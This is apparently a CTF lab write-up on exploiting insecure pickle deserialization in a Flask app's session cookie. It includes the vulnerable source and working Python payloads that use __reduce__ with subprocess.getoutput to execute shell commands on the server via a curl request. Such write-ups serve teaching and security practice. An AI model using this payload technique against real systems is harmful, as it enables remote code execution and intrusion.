Simple Web 0x16(Lab - Pickle)

Posted on | Post modified | In |

Simple Web 0x16(Lab - Pickle)

tags: NTUSTWS CTF Web
  • Challenge: http://h4ck3r.quest:8600/
  • Note: open a brand new window that haven’t login http://h4ck3r.quest

Background

0x15.5(Pickle)

Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
 
from flask import Flask, request, make_response, redirect, send_file
import base64
import pickle

app = Flask(__name__)


@app.route("/sauce")
def sauce():
    return send_file(__file__, mimetype="text/plain")


@app.route("/")
def main():
    session = request.cookies.get("session")
    if session == None:
        return '<form action="/login" method="POST">' +\
            '<p>Name: <input name="name" type="text"></p>' +\
            '<p>Age: <input name="age" type="number"></p>' +\
            '<button>Submit</button></form><hr><a href="/sauce">Source code</a>'

    else:
        user = pickle.loads(base64.b64decode(session))
        return f'<p>Name: {user["name"]}</p><p>Age: {user["age"]}</p>'


@app.route("/login", methods=['POST'])
def login():
    user = base64.b64encode(pickle.dumps({
        "name": request.form.get('name'),
        "age": int(request.form.get('age'))
    }))
    resp = make_response(redirect('/'))
    resp.set_cookie("session", user)
    return resp

Description & Analyze

In main function, it’ll request session and parse it by base64 then deserialize it.

If session is none, you can enter your name and age then it’ll serialize the data and transfer by base64.

For example: name=123, age=123

The Cookie: session=gASVGgAAAAAAAAB9lCiMBG5hbWWUjAMxMjOUjANhZ2WUS3t1Lg==

1
2
 
>>> pickle.loads(base64.b64decode('gASVGgAAAAAAAAB9lCiMBG5hbWWUjAMxMjOUjANhZ2WUS3t1Lg=='))
{'name': '123', 'age': 123}

Exploit

  1. Construct exploit function: Note that the format must be {'name': '', 'age': ''}
  2. Payload 
    1
    2
    3
    4
    5
    6
    7
    8
    		 
     class exploit(object):
     def __reduce__(self):
         return (__import__('subprocess').getoutput, ('ls',))

 serialized = pickle.dumps({
         "name": '123',
         "age": exploit()
         })

    Note that, must not use os.system in this situation. ‘Cause in addition to the result of os.system('{command}'), it’ll return exit status code.

    On Unix, the return value is the exit status of the process encoded in the format specified for wait(). Note that POSIX does not specify the meaning of the return value of the C system() function, so the return value of the Python function is system-dependent.

    So that if we use os.system as payload directly the output will not be render correctly.

    • For instance: 
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      		 
        class exploit(object):
  def __reduce__(self):
      return (os.system, ('ls',))


  serialized = pickle.dumps({
          "name": '123',
          "age": exploit()
          })
  optim_s = base64.b64encode(serialized)
  print(pickle.loads(base64.b64decode(optim_s)))

        $ python pickle_exp.py
  exploit.py  pickle_exp.py  server_app.py
  {'name': '123', 'age': 0}

      or You can execute it in wsl directly. So, you can use subprocess.getoutput to fetch the outcome without exit code

  3. Whole exploit 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    		 
     import pickle
 import os
 import pickletools
 import base64

 class exploit(object):
     def __reduce__(self):
         return (__import__('subprocess').getoutput, ('ls -al /',))


 serialized = pickle.dumps({
         "name": '123',
         "age": exploit()
         })
 optim_s = pickletools.optimize(serialized)

 cookie = base64.b64encode(optim_s).decode()

 os.system(f"curl http://h4ck3r.quest:8600/ --cookie 'session={cookie}'")

Result